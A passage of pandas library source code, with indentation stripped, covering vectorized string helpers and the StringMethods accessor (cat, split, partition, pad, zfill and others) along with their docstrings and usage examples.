3 aX
4 aX
dtype: object
Specify just `stop`, meaning the start of the string to `stop` is replaced
with `repl`, and the rest of the string is included.
>>> s.str.slice_replace(stop=2, repl='X')
0 X
1 X
2 Xc
3 Xdc
4 Xcde
dtype: object
Specify `start` and `stop`, meaning the slice from `start` to `stop` is
replaced with `repl`. Everything before or after `start` and `stop` is
included as is.
>>> s.str.slice_replace(start=1, stop=3, repl='X')
0 aX
1 aX
2 aX
3 aXc
4 aXde
dtype: object
"""
if repl is None:
repl = ""
def f(x):
if x[start:stop] == "":
local_stop = start
else:
local_stop = stop
y = ""
if start is not None:
y += x[:start]
y += repl
if stop is not None:
y += x[local_stop:]
return y
return _na_map(f, arr)
def str_strip(arr, to_strip=None, side="both"):
"""
Strip whitespace (including newlines) from each string in the
Series/Index.
Parameters
----------
to_strip : str or unicode
side : {'left', 'right', 'both'}, default 'both'
Returns
-------
Series or Index
"""
if side == "both":
f = lambda x: x.strip(to_strip)
elif side == "left":
f = lambda x: x.lstrip(to_strip)
elif side == "right":
f = lambda x: x.rstrip(to_strip)
else: # pragma: no cover
raise ValueError("Invalid side")
return _na_map(f, arr)
def str_wrap(arr, width, **kwargs):
r"""
Wrap long strings in the Series/Index to be formatted in
paragraphs with length less than a given width.
This method has the same keyword parameters and defaults as
:class:`textwrap.TextWrapper`.
Parameters
----------
width : int
Maximum line width.
expand_tabs : bool, optional
If True, tab characters will be expanded to spaces (default: True).
replace_whitespace : bool, optional
If True, each whitespace character (as defined by string.whitespace)
remaining after tab expansion will be replaced by a single space
(default: True).
drop_whitespace : bool, optional
If True, whitespace that, after wrapping, happens to end up at the
beginning or end of a line is dropped (default: True).
break_long_words : bool, optional
If True, then words longer than width will be broken in order to ensure
that no lines are longer than width. If it is false, long words will
not be broken, and some lines may be longer than width (default: True).
break_on_hyphens : bool, optional
If True, wrapping will occur preferably on whitespace and right after
hyphens in compound words, as it is customary in English. If false,
only whitespaces will be considered as potentially good places for line
breaks, but you need to set break_long_words to false if you want truly
insecable words (default: True).
Returns
-------
Series or Index
Notes
-----
Internally, this method uses a :class:`textwrap.TextWrapper` instance with
default settings. To achieve behavior matching R's stringr library str_wrap
function, use the arguments:
- expand_tabs = False
- replace_whitespace = True
- drop_whitespace = True
- break_long_words = False
- break_on_hyphens = False
Examples
--------
>>> s = pd.Series(['line to be wrapped', 'another line to be wrapped'])
>>> s.str.wrap(12)
0 line to be\nwrapped
1 another line\nto be\nwrapped
dtype: object
"""
kwargs["width"] = width
tw = textwrap.TextWrapper(**kwargs)
return _na_map(lambda s: "\n".join(tw.wrap(s)), arr)
def str_translate(arr, table):
"""
Map all characters in the string through the given mapping table.
Equivalent to standard :meth:`str.translate`.
Parameters
----------
table : dict
table is a mapping of Unicode ordinals to Unicode ordinals, strings, or
None. Unmapped characters are left untouched.
Characters mapped to None are deleted. :meth:`str.maketrans` is a
helper function for making translation tables.
Returns
-------
Series or Index
"""
return _na_map(lambda x: x.translate(table), arr)
def str_get(arr, i):
"""
Extract element from each component at specified position.
Extract element from lists, tuples, or strings in each element in the
Series/Index.
Parameters
----------
i : int
Position of element to extract.
Returns
-------
Series or Index
Examples
--------
>>> s = pd.Series(["String",
... (1, 2, 3),
... ["a", "b", "c"],
... 123,
... -456,
... {1: "Hello", "2": "World"}])
>>> s
0 String
1 (1, 2, 3)
2 [a, b, c]
3 123
4 -456
5 {1: 'Hello', '2': 'World'}
dtype: object
>>> s.str.get(1)
0 t
1 2
2 b
3 NaN
4 NaN
5 Hello
dtype: object
>>> s.str.get(-1)
0 g
1 3
2 c
3 NaN
4 NaN
5 None
dtype: object
"""
def f(x):
if isinstance(x, dict):
return x.get(i)
elif len(x) > i >= -len(x):
return x[i]
return np.nan
return _na_map(f, arr)
def str_decode(arr, encoding, errors="strict"):
"""
Decode character string in the Series/Index using indicated encoding.
Equivalent to :meth:`str.decode` in python2 and :meth:`bytes.decode` in
python3.
Parameters
----------
encoding : str
errors : str, optional
Returns
-------
Series or Index
"""
if encoding in _cpython_optimized_decoders:
# CPython optimized implementation
f = lambda x: x.decode(encoding, errors)
else:
decoder = codecs.getdecoder(encoding)
f = lambda x: decoder(x, errors)[0]
return _na_map(f, arr)
def str_encode(arr, encoding, errors="strict"):
"""
Encode character string in the Series/Index using indicated encoding.
Equivalent to :meth:`str.encode`.
Parameters
----------
encoding : str
errors : str, optional
Returns
-------
encoded : Series/Index of objects
"""
if encoding in _cpython_optimized_encoders:
# CPython optimized implementation
f = lambda x: x.encode(encoding, errors)
else:
encoder = codecs.getencoder(encoding)
f = lambda x: encoder(x, errors)[0]
return _na_map(f, arr)
def forbid_nonstring_types(forbidden, name=None):
"""
Decorator to forbid specific types for a method of StringMethods.
For calling `.str.{method}` on a Series or Index, it is necessary to first
initialize the :class:`StringMethods` object, and then call the method.
However, different methods allow different input types, and so this can not
be checked during :meth:`StringMethods.__init__`, but must be done on a
per-method basis. This decorator exists to facilitate this process, and
make it explicit which (inferred) types are disallowed by the method.
:meth:`StringMethods.__init__` allows the *union* of types its different
methods allow (after skipping NaNs; see :meth:`StringMethods._validate`),
namely: ['string', 'empty', 'bytes', 'mixed', 'mixed-integer'].
The default string types ['string', 'empty'] are allowed for all methods.
For the additional types ['bytes', 'mixed', 'mixed-integer'], each method
then needs to forbid the types it is not intended for.
Parameters
----------
forbidden : list-of-str or None
List of forbidden non-string types, may be one or more of
`['bytes', 'mixed', 'mixed-integer']`.
name : str, default None
Name of the method to use in the error message. By default, this is
None, in which case the name from the method being wrapped will be
copied. However, for working with further wrappers (like _pat_wrapper
and _noarg_wrapper), it is necessary to specify the name.
Returns
-------
func : wrapper
The method to which the decorator is applied, with an added check that
enforces the inferred type to not be in the list of forbidden types.
Raises
------
TypeError
If the inferred type of the underlying data is in `forbidden`.
"""
# deal with None
forbidden = [] if forbidden is None else forbidden
allowed_types = {"string", "empty", "bytes", "mixed", "mixed-integer"} - set(
forbidden
)
def _forbid_nonstring_types(func):
func_name = func.__name__ if name is None else name
@wraps(func)
def wrapper(self, *args, **kwargs):
if self._inferred_dtype not in allowed_types:
msg = (
"Cannot use .str.{name} with values of inferred dtype "
"{inf_type!r}.".format(
name=func_name, inf_type=self._inferred_dtype
)
)
raise TypeError(msg)
return func(self, *args, **kwargs)
wrapper.__name__ = func_name
return wrapper
return _forbid_nonstring_types
def _noarg_wrapper(f, name=None, docstring=None, forbidden_types=["bytes"], **kargs):
@forbid_nonstring_types(forbidden_types, name=name)
def wrapper(self):
result = _na_map(f, self._parent, **kargs)
return self._wrap_result(result)
wrapper.__name__ = f.__name__ if name is None else name
if docstring is not None:
wrapper.__doc__ = docstring
else:
raise ValueError("Provide docstring")
return wrapper
def _pat_wrapper(
f, flags=False, na=False, name=None, forbidden_types=["bytes"], **kwargs
):
@forbid_nonstring_types(forbidden_types, name=name)
def wrapper1(self, pat):
result = f(self._parent, pat)
return self._wrap_result(result)
@forbid_nonstring_types(forbidden_types, name=name)
def wrapper2(self, pat, flags=0, **kwargs):
result = f(self._parent, pat, flags=flags, **kwargs)
return self._wrap_result(result)
@forbid_nonstring_types(forbidden_types, name=name)
def wrapper3(self, pat, na=np.nan):
result = f(self._parent, pat, na=na)
return self._wrap_result(result)
wrapper = wrapper3 if na else wrapper2 if flags else wrapper1
wrapper.__name__ = f.__name__ if name is None else name
if f.__doc__:
wrapper.__doc__ = f.__doc__
return wrapper
def copy(source):
"Copy a docstring from another source function (if present)"
def do_copy(target):
if source.__doc__:
target.__doc__ = source.__doc__
return target
return do_copy
class StringMethods(NoNewAttributesMixin):
"""
Vectorized string functions for Series and Index. NAs stay NA unless
handled otherwise by a particular method. Patterned after Python's string
methods, with some inspiration from R's stringr package.
Examples
--------
>>> s.str.split('_')
>>> s.str.replace('_', '')
"""
def __init__(self, data):
self._inferred_dtype = self._validate(data)
self._is_categorical = is_categorical_dtype(data)
# .values.categories works for both Series/Index
self._parent = data.values.categories if self._is_categorical else data
# save orig to blow up categoricals to the right type
self._orig = data
self._freeze()
@staticmethod
def _validate(data):
"""
Auxiliary function for StringMethods, infers and checks dtype of data.
This is a "first line of defence" at the creation of the StringMethods-
object (see _make_accessor), and just checks that the dtype is in the
*union* of the allowed types over all string methods below; this
restriction is then refined on a per-method basis using the decorator
@forbid_nonstring_types (more info in the corresponding docstring).
This really should exclude all series/index with any non-string values,
but that isn't practical for performance reasons until we have a str
dtype (GH 9343 / 13877)
Parameters
----------
data : The content of the Series
Returns
-------
dtype : inferred dtype of data
"""
if isinstance(data, ABCMultiIndex):
raise AttributeError(
"Can only use .str accessor with Index, " "not MultiIndex"
)
# see _libs/lib.pyx for list of inferred types
allowed_types = ["string", "empty", "bytes", "mixed", "mixed-integer"]
values = getattr(data, "values", data) # Series / Index
values = getattr(values, "categories", values) # categorical / normal
try:
inferred_dtype = lib.infer_dtype(values, skipna=True)
except ValueError:
# GH#27571 mostly occurs with ExtensionArray
inferred_dtype = None
if inferred_dtype not in allowed_types:
raise AttributeError("Can only use .str accessor with string " "values!")
return inferred_dtype
def __getitem__(self, key):
if isinstance(key, slice):
return self.slice(start=key.start, stop=key.stop, step=key.step)
else:
return self.get(key)
def __iter__(self):
i = 0
g = self.get(i)
while g.notna().any():
yield g
i += 1
g = self.get(i)
def _wrap_result(
self, result, use_codes=True, name=None, expand=None, fill_value=np.nan
):
from pandas import Index, Series, MultiIndex
# for category, we do the stuff on the categories, so blow it up
# to the full series again
# But for some operations, we have to do the stuff on the full values,
# so make it possible to skip this step as the method already did this
# before the transformation...
if use_codes and self._is_categorical:
# if self._orig is a CategoricalIndex, there is no .cat-accessor
result = take_1d(
result, Series(self._orig, copy=False).cat.codes, fill_value=fill_value
)
if not hasattr(result, "ndim") or not hasattr(result, "dtype"):
return result
assert result.ndim < 3
if expand is None:
# infer from ndim if expand is not specified
expand = result.ndim != 1
elif expand is True and not isinstance(self._orig, Index):
# required when expand=True is explicitly specified
# not needed when inferred
def cons_row(x):
if is_list_like(x):
return x
else:
return [x]
result = [cons_row(x) for x in result]
if result:
# propagate nan values to match longest sequence (GH 18450)
max_len = max(len(x) for x in result)
result = [
x * max_len if len(x) == 0 or x[0] is np.nan else x for x in result
]
if not isinstance(expand, bool):
raise ValueError("expand must be True or False")
if expand is False:
# if expand is False, result should have the same name
# as the original otherwise specified
if name is None:
name = getattr(result, "name", None)
if name is None:
# do not use logical or, _orig may be a DataFrame
# which has "name" column
name = self._orig.name
# Wait until we are sure result is a Series or Index before
# checking attributes (GH 12180)
if isinstance(self._orig, Index):
# if result is a boolean np.array, return the np.array
# instead of wrapping it into a boolean Index (GH 8875)
if is_bool_dtype(result):
return result
if expand:
result = list(result)
out = MultiIndex.from_tuples(result, names=name)
if out.nlevels == 1:
# We had all tuples of length-one, which are
# better represented as a regular Index.
out = out.get_level_values(0)
return out
else:
return Index(result, name=name)
else:
index = self._orig.index
if expand:
cons = self._orig._constructor_expanddim
return cons(result, columns=name, index=index)
else:
# Must be a Series
cons = self._orig._constructor
return cons(result, name=name, index=index)
def _get_series_list(self, others, ignore_index=False):
"""
Auxiliary function for :meth:`str.cat`. Turn potentially mixed input
into a list of Series (elements without an index must match the length
of the calling Series/Index).
Parameters
----------
others : Series, Index, DataFrame, np.ndarray, list-like or list-like
of objects that are Series, Index or np.ndarray (1-dim)
ignore_index : boolean, default False
Determines whether to forcefully align others with index of caller
Returns
-------
tuple : (others transformed into list of Series,
boolean whether FutureWarning should be raised)
"""
# Once str.cat defaults to alignment, this function can be simplified;
# will not need `ignore_index` and the second boolean output anymore
from pandas import Index, Series, DataFrame
# self._orig is either Series or Index
idx = self._orig if isinstance(self._orig, Index) else self._orig.index
err_msg = (
"others must be Series, Index, DataFrame, np.ndarray or "
"list-like (either containing only strings or containing "
"only objects of type Series/Index/list-like/np.ndarray)"
)
# Generally speaking, all objects without an index inherit the index
# `idx` of the calling Series/Index - i.e. must have matching length.
# Objects with an index (i.e. Series/Index/DataFrame) keep their own
# index, *unless* ignore_index is set to True.
if isinstance(others, Series):
warn = not others.index.equals(idx)
# only reconstruct Series when absolutely necessary
los = [
Series(others.values, index=idx) if ignore_index and warn else others
]
return (los, warn)
elif isinstance(others, Index):
warn = not others.equals(idx)
los = [Series(others.values, index=(idx if ignore_index else others))]
return (los, warn)
elif isinstance(others, DataFrame):
warn = not others.index.equals(idx)
if ignore_index and warn:
# without copy, this could change "others"
# that was passed to str.cat
others = others.copy()
others.index = idx
return ([others[x] for x in others], warn)
elif isinstance(others, np.ndarray) and others.ndim == 2:
others = DataFrame(others, index=idx)
return ([others[x] for x in others], False)
elif is_list_like(others, allow_sets=False):
others = list(others) # ensure iterators do not get read twice etc
# in case of list-like `others`, all elements must be
# either one-dimensional list-likes or scalars
if all(is_list_like(x, allow_sets=False) for x in others):
los = []
join_warn = False
depr_warn = False
# iterate through list and append list of series for each
# element (which we check to be one-dimensional and non-nested)
while others:
nxt = others.pop(0) # nxt is guaranteed list-like by above
# GH 21950 - DeprecationWarning
# only allowing Series/Index/np.ndarray[1-dim] will greatly
# simply this function post-deprecation.
if not (
isinstance(nxt, (Series, Index))
or (isinstance(nxt, np.ndarray) and nxt.ndim == 1)
):
depr_warn = True
if not isinstance(nxt, (DataFrame, Series, Index, np.ndarray)):
# safety for non-persistent list-likes (e.g. iterators)
# do not map indexed/typed objects; info needed below
nxt = list(nxt)
# known types for which we can avoid deep inspection
no_deep = (
isinstance(nxt, np.ndarray) and nxt.ndim == 1
) or isinstance(nxt, (Series, Index))
# nested list-likes are forbidden:
# -> elements of nxt must not be list-like
is_legal = (no_deep and nxt.dtype == object) or all(
not is_list_like(x) for x in nxt
)
# DataFrame is false positive of is_legal
# because "x in df" returns column names
if not is_legal or isinstance(nxt, DataFrame):
raise TypeError(err_msg)
nxt, wnx = self._get_series_list(nxt, ignore_index=ignore_index)
los = los + nxt
join_warn = join_warn or wnx
if depr_warn:
warnings.warn(
"list-likes other than Series, Index, or "
"np.ndarray WITHIN another list-like are "
"deprecated and will be removed in a future "
"version.",
FutureWarning,
stacklevel=4,
)
return (los, join_warn)
elif all(not is_list_like(x) for x in others):
return ([Series(others, index=idx)], False)
raise TypeError(err_msg)
@forbid_nonstring_types(["bytes", "mixed", "mixed-integer"])
def cat(self, others=None, sep=None, na_rep=None, join=None):
"""
Concatenate strings in the Series/Index with given separator.
If `others` is specified, this function concatenates the Series/Index
and elements of `others` element-wise.
If `others` is not passed, then all values in the Series/Index are
concatenated into a single string with a given `sep`.
Parameters
----------
others : Series, Index, DataFrame, np.ndarray or list-like
Series, Index, DataFrame, np.ndarray (one- or two-dimensional) and
other list-likes of strings must have the same length as the
calling Series/Index, with the exception of indexed objects (i.e.
Series/Index/DataFrame) if `join` is not None.
If others is a list-like that contains a combination of Series,
Index or np.ndarray (1-dim), then all elements will be unpacked and
must satisfy the above criteria individually.
If others is None, the method returns the concatenation of all
strings in the calling Series/Index.
sep : str, default ''
The separator between the different elements/columns. By default
the empty string `''` is used.
na_rep : str or None, default None
Representation that is inserted for all missing values:
- If `na_rep` is None, and `others` is None, missing values in the
Series/Index are omitted from the result.
- If `na_rep` is None, and `others` is not None, a row containing a
missing value in any of the columns (before concatenation) will
have a missing value in the result.
join : {'left', 'right', 'outer', 'inner'}, default None
Determines the join-style between the calling Series/Index and any
Series/Index/DataFrame in `others` (objects without an index need
to match the length of the calling Series/Index). If None,
alignment is disabled, but this option will be removed in a future
version of pandas and replaced with a default of `'left'`. To
disable alignment, use `.values` on any Series/Index/DataFrame in
`others`.
.. versionadded:: 0.23.0
Returns
-------
str, Series or Index
If `others` is None, `str` is returned, otherwise a `Series/Index`
(same type as caller) of objects is returned.
See Also
--------
split : Split each string in the Series/Index.
join : Join lists contained as elements in the Series/Index.
Examples
--------
When not passing `others`, all values are concatenated into a single
string:
>>> s = pd.Series(['a', 'b', np.nan, 'd'])
>>> s.str.cat(sep=' ')
'a b d'
By default, NA values in the Series are ignored. Using `na_rep`, they
can be given a representation:
>>> s.str.cat(sep=' ', na_rep='?')
'a b ? d'
If `others` is specified, corresponding values are concatenated with
the separator. Result will be a Series of strings.
>>> s.str.cat(['A', 'B', 'C', 'D'], sep=',')
0 a,A
1 b,B
2 NaN
3 d,D
dtype: object
Missing values will remain missing in the result, but can again be
represented using `na_rep`
>>> s.str.cat(['A', 'B', 'C', 'D'], sep=',', na_rep='-')
0 a,A
1 b,B
2 -,C
3 d,D
dtype: object
If `sep` is not specified, the values are concatenated without
separation.
>>> s.str.cat(['A', 'B', 'C', 'D'], na_rep='-')
0 aA
1 bB
2 -C
3 dD
dtype: object
Series with different indexes can be aligned before concatenation. The
`join`-keyword works as in other methods.
>>> t = pd.Series(['d', 'a', 'e', 'c'], index=[3, 0, 4, 2])
>>> s.str.cat(t, join='left', na_rep='-')
0 aa
1 b-
2 -c
3 dd
dtype: object
>>>
>>> s.str.cat(t, join='outer', na_rep='-')
0 aa
1 b-
2 -c
3 dd
4 -e
dtype: object
>>>
>>> s.str.cat(t, join='inner', na_rep='-')
0 aa
2 -c
3 dd
dtype: object
>>>
>>> s.str.cat(t, join='right', na_rep='-')
3 dd
0 aa
4 -e
2 -c
dtype: object
For more examples, see :ref:`here <text.concatenate>`.
"""
from pandas import Index, Series, concat
if isinstance(others, str):
raise ValueError("Did you mean to supply a `sep` keyword?")
if sep is None:
sep = ""
if isinstance(self._orig, Index):
data = Series(self._orig, index=self._orig)
else: # Series
data = self._orig
# concatenate Series/Index with itself if no "others"
if others is None:
data = ensure_object(data)
na_mask = isna(data)
if na_rep is None and na_mask.any():
data = data[~na_mask]
elif na_rep is not None and na_mask.any():
data = np.where(na_mask, na_rep, data)
return sep.join(data)
try:
# turn anything in "others" into lists of Series
others, warn = self._get_series_list(others, ignore_index=(join is None))
except ValueError: # do not catch TypeError raised by _get_series_list
if join is None:
raise ValueError(
"All arrays must be same length, except "
"those having an index if `join` is not None"
)
else:
raise ValueError(
"If `others` contains arrays or lists (or "
"other list-likes without an index), these "
"must all be of the same length as the "
"calling Series/Index."
)
if join is None and warn:
warnings.warn(
"A future version of pandas will perform index "
"alignment when `others` is a Series/Index/"
"DataFrame (or a list-like containing one). To "
"disable alignment (the behavior before v.0.23) and "
"silence this warning, use `.values` on any Series/"
"Index/DataFrame in `others`. To enable alignment "
"and silence this warning, pass `join='left'|"
"'outer'|'inner'|'right'`. The future default will "
"be `join='left'`.",
FutureWarning,
stacklevel=3,
)
# if join is None, _get_series_list already force-aligned indexes
join = "left" if join is None else join
# align if required
if any(not data.index.equals(x.index) for x in others):
# Need to add keys for uniqueness in case of duplicate columns
others = concat(
others,
axis=1,
join=(join if join == "inner" else "outer"),
keys=range(len(others)),
sort=False,
copy=False,
)
data, others = data.align(others, join=join)
others = [others[x] for x in others] # again list of Series
all_cols = [ensure_object(x) for x in [data] + others]
na_masks = np.array([isna(x) for x in all_cols])
union_mask = np.logical_or.reduce(na_masks, axis=0)
if na_rep is None and union_mask.any():
# no na_rep means NaNs for all rows where any column has a NaN
# only necessary if there are actually any NaNs
result = np.empty(len(data), dtype=object)
np.putmask(result, union_mask, np.nan)
not_masked = ~union_mask
result[not_masked] = cat_safe([x[not_masked] for x in all_cols], sep)
elif na_rep is not None and union_mask.any():
# fill NaNs with na_rep in case there are actually any NaNs
all_cols = [
np.where(nm, na_rep, col) for nm, col in zip(na_masks, all_cols)
]
result = cat_safe(all_cols, sep)
else:
# no NaNs - can just concatenate
result = cat_safe(all_cols, sep)
if isinstance(self._orig, Index):
# add dtype for case that result is all-NA
result = Index(result, dtype=object, name=self._orig.name)
else: # Series
result = Series(
result, dtype=object, index=data.index, name=self._orig.name
)
return result
_shared_docs[
"str_split"
] = r"""
Split strings around given separator/delimiter.
Splits the string in the Series/Index from the %(side)s,
at the specified delimiter string. Equivalent to :meth:`str.%(method)s`.
Parameters
----------
pat : str, optional
String or regular expression to split on.
If not specified, split on whitespace.
n : int, default -1 (all)
Limit number of splits in output.
``None``, 0 and -1 will be interpreted as return all splits.
expand : bool, default False
Expand the splitted strings into separate columns.
* If ``True``, return DataFrame/MultiIndex expanding dimensionality.
* If ``False``, return Series/Index, containing lists of strings.
Returns
-------
Series, Index, DataFrame or MultiIndex
Type matches caller unless ``expand=True`` (see Notes).
See Also
--------
Series.str.split : Split strings around given separator/delimiter.
Series.str.rsplit : Splits string around given separator/delimiter,
starting from the right.
Series.str.join : Join lists contained as elements in the Series/Index
with passed delimiter.
str.split : Standard library version for split.
str.rsplit : Standard library version for rsplit.
Notes
-----
The handling of the `n` keyword depends on the number of found splits:
- If found splits > `n`, make first `n` splits only
- If found splits <= `n`, make all splits
- If for a certain row the number of found splits < `n`,
append `None` for padding up to `n` if ``expand=True``
If using ``expand=True``, Series and Index callers return DataFrame and
MultiIndex objects, respectively.
Examples
--------
>>> s = pd.Series(["this is a regular sentence",
... "https://docs.python.org/3/tutorial/index.html",
... np.nan])
0 this is a regular sentence
1 https://docs.python.org/3/tutorial/index.html
2 NaN
dtype: object
In the default setting, the string is split by whitespace.
>>> s.str.split()
0 [this, is, a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
Without the `n` parameter, the outputs of `rsplit` and `split`
are identical.
>>> s.str.rsplit()
0 [this, is, a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
The `n` parameter can be used to limit the number of splits on the
delimiter. The outputs of `split` and `rsplit` are different.
>>> s.str.split(n=2)
0 [this, is, a regular sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
>>> s.str.rsplit(n=2)
0 [this is a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
The `pat` parameter can be used to split by other characters.
>>> s.str.split(pat = "/")
0 [this is a regular sentence]
1 [https:, , docs.python.org, 3, tutorial, index...
2 NaN
dtype: object
When using ``expand=True``, the split elements will expand out into
separate columns. If NaN is present, it is propagated throughout
the columns during the split.
>>> s.str.split(expand=True)
0 1 2 3
0 this is a regular
1 https://docs.python.org/3/tutorial/index.html None None None
2 NaN NaN NaN NaN \
4
0 sentence
1 None
2 NaN
For slightly more complex use cases like splitting the html document name
from a url, a combination of parameter settings can be used.
>>> s.str.rsplit("/", n=1, expand=True)
0 1
0 this is a regular sentence None
1 https://docs.python.org/3/tutorial index.html
2 NaN NaN
Remember to escape special characters when explicitly using regular
expressions.
>>> s = pd.Series(["1+1=2"])
>>> s.str.split(r"\+|=", expand=True)
0 1 2
0 1 1 2
"""
@Appender(_shared_docs["str_split"] % {"side": "beginning", "method": "split"})
@forbid_nonstring_types(["bytes"])
def split(self, pat=None, n=-1, expand=False):
result = str_split(self._parent, pat, n=n)
return self._wrap_result(result, expand=expand)
@Appender(_shared_docs["str_split"] % {"side": "end", "method": "rsplit"})
@forbid_nonstring_types(["bytes"])
def rsplit(self, pat=None, n=-1, expand=False):
result = str_rsplit(self._parent, pat, n=n)
return self._wrap_result(result, expand=expand)
_shared_docs[
"str_partition"
] = """
Split the string at the %(side)s occurrence of `sep`.
This method splits the string at the %(side)s occurrence of `sep`,
and returns 3 elements containing the part before the separator,
the separator itself, and the part after the separator.
If the separator is not found, return %(return)s.
Parameters
----------
sep : str, default whitespace
String to split on.
pat : str, default whitespace
.. deprecated:: 0.24.0
Use ``sep`` instead
expand : bool, default True
If True, return DataFrame/MultiIndex expanding dimensionality.
If False, return Series/Index.
Returns
-------
DataFrame/MultiIndex or Series/Index of objects
See Also
--------
%(also)s
Series.str.split : Split strings around given separators.
str.partition : Standard library version.
Examples
--------
>>> s = pd.Series(['Linda van der Berg', 'George Pitt-Rivers'])
>>> s
0 Linda van der Berg
1 George Pitt-Rivers
dtype: object
>>> s.str.partition()
0 1 2
0 Linda van der Berg
1 George Pitt-Rivers
To partition by the last space instead of the first one:
>>> s.str.rpartition()
0 1 2
0 Linda van der Berg
1 George Pitt-Rivers
To partition by something different than a space:
>>> s.str.partition('-')
0 1 2
0 Linda van der Berg
1 George Pitt - Rivers
To return a Series containing tuples instead of a DataFrame:
>>> s.str.partition('-', expand=False)
0 (Linda van der Berg, , )
1 (George Pitt, -, Rivers)
dtype: object
Also available on indices:
>>> idx = pd.Index(['X 123', 'Y 999'])
>>> idx
Index(['X 123', 'Y 999'], dtype='object')
Which will create a MultiIndex:
>>> idx.str.partition()
MultiIndex([('X', ' ', '123'),
('Y', ' ', '999')],
dtype='object')
Or an index with tuples with ``expand=False``:
>>> idx.str.partition(expand=False)
Index([('X', ' ', '123'), ('Y', ' ', '999')], dtype='object')
"""
@Appender(
_shared_docs["str_partition"]
% {
"side": "first",
"return": "3 elements containing the string itself, followed by two "
"empty strings",
"also": "rpartition : Split the string at the last occurrence of " "`sep`.",
}
)
@deprecate_kwarg(old_arg_name="pat", new_arg_name="sep")
@forbid_nonstring_types(["bytes"])
def partition(self, sep=" ", expand=True):
f = lambda x: x.partition(sep)
result = _na_map(f, self._parent)
return self._wrap_result(result, expand=expand)
@Appender(
_shared_docs["str_partition"]
% {
"side": "last",
"return": "3 elements containing two empty strings, followed by the "
"string itself",
"also": "partition : Split the string at the first occurrence of " "`sep`.",
}
)
@deprecate_kwarg(old_arg_name="pat", new_arg_name="sep")
@forbid_nonstring_types(["bytes"])
def rpartition(self, sep=" ", expand=True):
f = lambda x: x.rpartition(sep)
result = _na_map(f, self._parent)
return self._wrap_result(result, expand=expand)
@copy(str_get)
def get(self, i):
result = str_get(self._parent, i)
return self._wrap_result(result)
@copy(str_join)
@forbid_nonstring_types(["bytes"])
def join(self, sep):
result = str_join(self._parent, sep)
return self._wrap_result(result)
@copy(str_contains)
@forbid_nonstring_types(["bytes"])
def contains(self, pat, case=True, flags=0, na=np.nan, regex=True):
result = str_contains(
self._parent, pat, case=case, flags=flags, na=na, regex=regex
)
return self._wrap_result(result, fill_value=na)
@copy(str_match)
@forbid_nonstring_types(["bytes"])
def match(self, pat, case=True, flags=0, na=np.nan):
result = str_match(self._parent, pat, case=case, flags=flags, na=na)
return self._wrap_result(result, fill_value=na)
@copy(str_replace)
@forbid_nonstring_types(["bytes"])
def replace(self, pat, repl, n=-1, case=None, flags=0, regex=True):
result = str_replace(
self._parent, pat, repl, n=n, case=case, flags=flags, regex=regex
)
return self._wrap_result(result)
@copy(str_repeat)
@forbid_nonstring_types(["bytes"])
def repeat(self, repeats):
result = str_repeat(self._parent, repeats)
return self._wrap_result(result)
@copy(str_pad)
@forbid_nonstring_types(["bytes"])
def pad(self, width, side="left", fillchar=" "):
result = str_pad(self._parent, width, side=side, fillchar=fillchar)
return self._wrap_result(result)
_shared_docs[
"str_pad"
] = """
Filling %(side)s side of strings in the Series/Index with an
additional character. Equivalent to :meth:`str.%(method)s`.
Parameters
----------
width : int
Minimum width of resulting string; additional characters will be filled
with ``fillchar``
fillchar : str
Additional character for filling, default is whitespace
Returns
-------
filled : Series/Index of objects
"""
@Appender(_shared_docs["str_pad"] % dict(side="left and right", method="center"))
@forbid_nonstring_types(["bytes"])
def center(self, width, fillchar=" "):
return self.pad(width, side="both", fillchar=fillchar)
@Appender(_shared_docs["str_pad"] % dict(side="right", method="ljust"))
@forbid_nonstring_types(["bytes"])
def ljust(self, width, fillchar=" "):
return self.pad(width, side="right", fillchar=fillchar)
@Appender(_shared_docs["str_pad"] % dict(side="left", method="rjust"))
@forbid_nonstring_types(["bytes"])
def rjust(self, width, fillchar=" "):
return self.pad(width, side="left", fillchar=fillchar)
@forbid_nonstring_types(["bytes"])
def zfill(self, width):
"""
Pad strings in the Series/Index by prepending '0' characters.
Strings in the Series/Index are padded with '0' characters on the
left of the string to reach a total string length `width`. Strings
in the Series/Index with length greater or equal to `width` are
unchanged.
Parameters
----------
width : int
Minimum length of resulting string; strings with length less
than `width` be prepended with '0' characters.
Returns
-------
Series/Index of objects
See Also
--------
Series.str.rjust : Fills the left side of strings with an arbitrary
character.
Series.str.ljust : Fills the right side of strings with an arbitrary
character.
Series.str.pad : Fills the specified sides of strings with an arbitrary
character.
Series.str.center : Fills boths sides of strings with an arbitrary
character.
Notes
-----
Differs from :meth:`str.zfill` which has special handling
for '+'/'-' in the string.
Examples
--------
>>> s = pd.Series(['-1', '1', '1000', 10, np.nan])
>>> s
0 -1
1 1
2 1000
3 10
4 NaN
dtype: object
Note that ``10`` and ``NaN`` are not strings, therefore they are
converted to ``NaN``. The minus sign in ``'-1'`` is treated as a
regular character and the zero is added to the left of it
(:meth:`str.zfill` would have moved it to the left). ``1000``
remains unchanged as it is longer than `width`.
>>> s.str.zfill(3)
0 0-1
1 001
2 1000
3 NaN
4 NaN
dtype: object
"""
result = str_pad(self._parent, width, side="left", fillchar="0")
return self._wrap_result(result)
@copy(str_slice)
def slice(self, start=None, stop=None, step=None):
result = str_slice(self._parent, start, stop, step)
return self._wrap_result(result)
@copy(str_slice_replace)
@forbid_nonstring_types(["bytes"])
def slice_replace(self, start=None, stop=None, repl=None):
result = str_slice_replace(self._parent, start, stop, repl)
return self._wrap_result(result)
@copy(str_decode)
def decode(self, encoding, errors="strict"):
# need to allow bytes here
result = str_decode(self._parent, encoding, errors)
return self._wrap_result(result)
@copy(str_encode)
@forbid_nonstring_types(["bytes"])
def encode(self, encoding, errors="strict"):
result = str_encode(self._parent, encoding, errors)
return self._wrap_result(result)
_shared_docs[
"str_strip"
] = r"""
Remove leading and trailing characters.
Strip whitespaces (including newlines) or a set of specified characters
from each string in the Series/Index from %(side)s.
Equivalent to :meth:`str.%(method)s`.
Parameters
----------
to_strip : str or None, default None
Specifying the set of characters to be removed.
All combinations of this set of characters will be stripped.
If None then whitespaces are removed.
Returns
-------
Series/Index of objects
See Also
--------
Series.str.strip : Remove leading and trailing characters in Series/Index.
Series.str.lstrip : Remove leading characters in Series/Index.
